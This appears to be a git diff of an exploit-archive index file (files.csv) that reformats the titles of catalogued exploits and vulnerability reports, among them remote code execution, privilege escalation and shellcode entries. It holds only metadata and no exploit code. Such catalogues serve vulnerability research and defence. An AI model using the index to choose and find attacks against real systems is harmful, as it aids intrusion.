diff --git a/files.csv b/files.csv index 9fc4c9e81..75cb4e1a2 100755 --- a/files.csv +++ b/files.csv @@ -1630,7 +1630,7 @@ id,file,description,date,author,platform,type,port 1919,platforms/php/webapps/1919.txt,"CMS Faethon <= 1.3.2 (mainpath) Remote File Inclusion Vulnerability",2006-06-16,K-159,php,webapps,0 1920,platforms/php/webapps/1920.php,"Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0 1921,platforms/php/webapps/1921.pl,"FlashBB <= 1.1.8 (phpbb_root_path) Remote File Include Exploit",2006-06-17,h4ntu,php,webapps,0 -1922,platforms/php/webapps/1922.php,"Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0 +1922,platforms/php/webapps/1922.php,"Joomla <= 1.0.9 - (Weblinks) Remote Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0 1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 (ipath) Remote File Include Vulnerability",2006-06-17,Basti,php,webapps,0 1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 Root Password Disclosure",2006-06-18,php0t,multiple,local,0 1925,platforms/php/webapps/1925.txt,"INDEXU <= 5.0.1 (admin_template_path) Remote Include Vulnerabilities",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0 @@ -12872,7 +12872,7 @@ id,file,description,date,author,platform,type,port 14703,platforms/php/webapps/14703.txt,"Joomla Component Biblioteca 1.0 Beta - Multiple SQL Injection Vulnerabilities",2010-08-21,"Salvatore Fresta",php,webapps,0 14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script SQL Injection Vulnerability",2010-08-21,"Br0wn Sug4r",asp,webapps,0 14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability",2010-08-21,l3D,windows,dos,0 -14706,platforms/windows/local/14706.py,"Microsoft Excel Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0 +14706,platforms/windows/local/14706.py,"Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0 14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection Vulnerability",2010-08-22,L1nK,asp,webapps,0 14711,platforms/windows/dos/14711.py,"Tplayer V1R10 - Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0 14712,platforms/php/webapps/14712.txt,"4Images 1.7.8 - Remote File Inclusion Vulnerability",2010-08-23,LoSt.HaCkEr,php,webapps,0 @@ -13858,7 +13858,7 @@ id,file,description,date,author,platform,type,port 15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 - Local Kernel Mode DoS Exploit",2011-01-16,MJ0011,windows,dos,0 15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 (bid) Blind SQL Injection Vulnerability",2011-01-16,"BorN To K!LL",php,webapps,0 16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0 -16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability",2011-01-16,"Mark Stanislav",php,webapps,0 +16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent XSS Vulnerability",2011-01-16,"Mark Stanislav",php,webapps,0 16001,platforms/php/webapps/16001.txt,"People Joomla Component 1.0.0 - Local File Inclusion Vulnerability",2011-01-16,"ALTBTA ",php,webapps,0 16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 (cart.php) Blind SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0 16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon SQL Injection",2011-01-17,Saif,php,webapps,0 @@ -14833,7 +14833,7 @@ id,file,description,date,author,platform,type,port 17045,platforms/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP - DoS",2011-03-24,"Craig Freyman",windows,dos,69 17046,platforms/php/webapps/17046.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2011-03-24,"High-Tech Bridge SA",php,webapps,0 17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",2011-03-25,metasploit,windows,remote,0 -17048,platforms/windows/remote/17048.rb,"VLC AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0 +17048,platforms/windows/remote/17048.rb,"VLC - AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0 17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection",2011-03-26,LiquidWorm,php,webapps,0 17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0 17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0 @@ -21506,7 +21506,7 @@ id,file,description,date,author,platform,type,port 24318,platforms/windows/shellcode/24318.c,"Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0 24319,platforms/windows/dos/24319.txt,"Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite",2013-01-24,shinnai,windows,dos,0 24320,platforms/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection Vulnerability",2013-01-24,RealGame,multiple,webapps,0 -24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x_ 4.3x Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0 +24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x_ 4.3x - Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0 24322,platforms/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload",2013-01-24,metasploit,multiple,remote,0 24323,platforms/multiple/remote/24323.rb,"Novell eDirectory 8 - Buffer Overflow",2013-01-24,metasploit,multiple,remote,0 24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module Cross-Site Scripting Vulnerability",2004-07-26,DarkBicho,php,webapps,0 @@ -26934,7 +26934,7 @@ id,file,description,date,author,platform,type,port 29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0 29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0 29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0 -29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0 +29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0 29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 Admin/Index.php Directory Traversal Vulnerability",2007-04-11,Dr.RoVeR,php,webapps,0 29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a CGI Check Cookie Command Remote Authentication Bypass Vulnerability",2007-04-11,"Jon Oberheide",cgi,webapps,0 29843,platforms/windows/remote/29843.txt,"webMethods Glue <= 6.5.1 Console Directory Traversal Vulnerability",2007-04-11,"Patrick Webster",windows,remote,0 @@ -32579,7 +32579,7 @@ id,file,description,date,author,platform,type,port 36150,platforms/php/webapps/36150.txt,"Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0 36151,platforms/php/webapps/36151.txt,"Zyncro 3.0.1.20 Social Network Message Menu SQL Injection Vulnerability",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0 36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC",2015-02-22,"Praveen Darshanam",windows,dos,0 -36169,platforms/multiple/remote/36169.rb,"HP Client Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465 +36169,platforms/multiple/remote/36169.rb,"HP Client - Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465 36154,platforms/php/webapps/36154.txt,"Beehive Forum 1.4.4 - Stored XSS Vulnerability",2015-02-23,"Halil Dalabasmaz",php,webapps,0 36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 Unrestricted File Upload Exploit",2015-02-23,"CWH Underground",php,webapps,80 36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80 @@ -32631,7 +32631,7 @@ id,file,description,date,author,platform,type,port 36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0 36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0 -36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465 +36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465 36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0 @@ -32756,7 +32756,7 @@ id,file,description,date,author,platform,type,port 36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion - Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0 36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0 36336,platforms/windows/dos/36336.txt,"Microsoft Windows Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0 -36337,platforms/linux/remote/36337.py,"ElasticSearch Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200 +36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200 36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0 36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 'snum' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0 36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0 @@ -32829,7 +32829,7 @@ id,file,description,date,author,platform,type,port 36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption Vulnerability",2011-12-02,"High-Tech Bridge SA",windows,dos,0 36404,platforms/linux/dos/36404.c,"GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability",2009-06-01,dividead,linux,dos,0 36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80 -36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200 +36415,platforms/java/remote/36415.rb,"ElasticSearch - Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200 36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 'err' Parameter Cross Site Scripting Vulnerability",2012-01-01,Net.Edit0r,php,webapps,0 36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 's' Parameter Cross Site Scripting Vulnerability",2012-01-01,"H4ckCity Security Team",php,webapps,0 36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 'q' Parameter Cross Site Scripting Vulnerability",2011-01-01,"H4ckCity Security Team",php,webapps,0 @@ -32966,7 +32966,7 @@ id,file,description,date,author,platform,type,port 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0 36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0 -36747,platforms/linux/local/36747.c,"Fedora abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 +36747,platforms/linux/local/36747.c,"Fedora - abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0 36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0 @@ -33640,7 +33640,7 @@ id,file,description,date,author,platform,type,port 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443 37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,8080 37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF Vulnerability",2015-06-10,"RedTeam Pentesting",hardware,webapps,80 -37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0 +37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 - Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80 37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80 37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - 'diff' Command Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0 @@ -33713,7 +33713,7 @@ id,file,description,date,author,platform,type,port 37364,platforms/php/webapps/37364.txt,"Joomla SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80 37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 - Download & Execute",2015-06-24,B3mB4m,lin_x86,shellcode,0 37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 - Reboot (28 Bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 -37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0 +37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0 37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0 37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0 37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x 'Upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0 @@ -34307,7 +34307,7 @@ id,file,description,date,author,platform,type,port 37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service Vulnerability",2015-08-28,Vulnerability-Lab,ios,dos,3030 37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0 -38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80 +38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80 38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80 @@ -34557,7 +34557,7 @@ id,file,description,date,author,platform,type,port 38272,platforms/windows/dos/38272.txt,"Windows Kernel - Brush Object Use-After-Free Vulnerability (MS15-061)",2015-09-22,"Google Security Research",windows,dos,0 38273,platforms/win32/dos/38273.txt,"Windows Kernel - WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0 38274,platforms/win32/dos/38274.txt,"Windows Kernel - NULL Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0 -38275,platforms/win32/dos/38275.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0 +38275,platforms/win32/dos/38275.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)",2015-09-22,"Nils Sommer",win32,dos,0 38276,platforms/win32/dos/38276.txt,"Windows Kernel - FlashWindowEx​ Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0 38277,platforms/win32/dos/38277.txt,"Windows Kernel - bGetRealizedBrush Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0 38278,platforms/win32/dos/38278.txt,"Windows Kernel - Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0 @@ -34642,7 +34642,7 @@ id,file,description,date,author,platform,type,port 38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting Vulnerability",2013-03-05,alejandr0.m0f0,php,webapps,0 38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0 38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,metasploit,multiple,remote,0 -38401,platforms/windows/remote/38401.rb,"Kaseya VSA uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0 +38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0 38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0 38363,platforms/php/webapps/38363.txt,"File Manager HTML Injection and Local File Include Vulnerabilities",2013-02-23,"Benjamin Kunz Mejri",php,webapps,0 38364,platforms/multiple/dos/38364.txt,"Varnish Cache Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos,0 @@ -34879,7 +34879,7 @@ id,file,description,date,author,platform,type,port 38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0 38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0 38612,platforms/android/dos/38612.txt,"Samsung Galaxy S6 - libQjpeg DoIntegralUpsample Crash",2015-11-03,"Google Security Research",android,dos,0 -38613,platforms/android/dos/38613.txt,"Samsung Galaxy S6 - Samsung Gallery Bitmap Decoding Crash",2015-11-03,"Google Security Research",android,dos,0 +38613,platforms/android/dos/38613.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-11-03,"Google Security Research",android,dos,0 38614,platforms/android/dos/38614.txt,"Samsung libQjpeg Image Decoding Memory Corruption",2015-11-03,"Google Security Research",android,dos,0 38615,platforms/windows/dos/38615.txt,"Python 2.7 hotshot Module - pack_string Heap Buffer Overflow",2015-11-03,"John Leitch",windows,dos,0 38616,platforms/multiple/dos/38616.txt,"Python 2.7 array.fromstring Method - Use After Free",2015-11-03,"John Leitch",multiple,dos,0 @@ -35544,8 +35544,8 @@ id,file,description,date,author,platform,type,port 39375,platforms/osx/dos/39375.c,"OS X Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39308,platforms/linux/dos/39308.c,"Linux Kernel <= 3.x / <= 4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0 39309,platforms/php/webapps/39309.txt,"WordPress Booking Calendar Contact Form Plugin <=1.1.23 - Unauthenticated SQL injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80 -39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux 2 (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 -39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 +39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 +39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 39312,platforms/lin_x86-64/shellcode/39312.c,"x86_64 Linux xor/not/div Encoded execve Shellcode",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0 39313,platforms/php/webapps/39313.txt,"Food Order Portal 'admin_user_delete.php' Cross Site Request Forgery Vulnerability",2014-09-12,KnocKout,php,webapps,0 39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers Information Disclosure Vulnerability",2014-09-15,"Eric Fajardo",hardware,remote,0 @@ -35660,7 +35660,7 @@ id,file,description,date,author,platform,type,port 39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption 2",2016-02-09,"Francis Provencher",windows,dos,0 39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC IFF File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 -39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016)",2016-02-10,koczkatamas,windows,local,0 +39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0 39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0 39435,platforms/multiple/webapps/39435.txt,"Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure Vulnerability",2016-02-10,Vulnerability-Lab,multiple,webapps,0 39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80 @@ -35736,7 +35736,7 @@ id,file,description,date,author,platform,type,port 39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0 39513,platforms/php/webapps/39513.txt,"WordPress CP Polls Plugin 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80 39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 SQL Injection / Remote Code Execution",2016-03-01,metasploit,php,remote,80 -39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080 +39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080 39516,platforms/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,69 39517,platforms/windows/dos/39517.py,"Freeproxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,8080 39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash PoC",2016-03-02,redknight99,windows,dos,0 @@ -35789,7 +35789,7 @@ id,file,description,date,author,platform,type,port 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80 39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0 -39574,platforms/windows/local/39574.cs,"Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0 +39574,platforms/windows/local/39574.cs,"Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0 39575,platforms/php/webapps/39575.txt,"WordPress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 39576,platforms/php/webapps/39576.txt,"WordPress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 39577,platforms/php/webapps/39577.txt,"WordPress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80 @@ -35810,7 +35810,7 @@ id,file,description,date,author,platform,type,port 39592,platforms/php/webapps/39592.txt,"WordPress Dharma booking Plugin 2.38.3 - File Inclusion Vulnerability",2016-03-22,AMAR^SHG,php,webapps,80 39593,platforms/php/webapps/39593.txt,"WordPress Memphis Document Library Plugin 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80 39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - .m3u Stack Overflow",2016-03-22,"Charley Celice",windows,local,0 -39595,platforms/multiple/local/39595.txt,"OS X / iOS Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0 +39595,platforms/multiple/local/39595.txt,"OS X / iOS - Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0 39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0 39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection Vulnerability",2016-03-23,"Goran Tuzovic",multiple,webapps,80 39621,platforms/php/webapps/39621.txt,"WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 @@ -35910,7 +35910,7 @@ id,file,description,date,author,platform,type,port 39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0 39707,platforms/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",php,webapps,80 -39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80 +39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80 39709,platforms/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443 39710,platforms/php/webapps/39710.txt,"modified eCommerce Shopsoftware 2.0.0.0 rev 9678 - Blind SQL Injection",2016-04-19,"Felix Maduakor",php,webapps,80 39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80 @@ -35940,7 +35940,7 @@ id,file,description,date,author,platform,type,port 39738,platforms/multiple/webapps/39738.html,"EMC ViPR 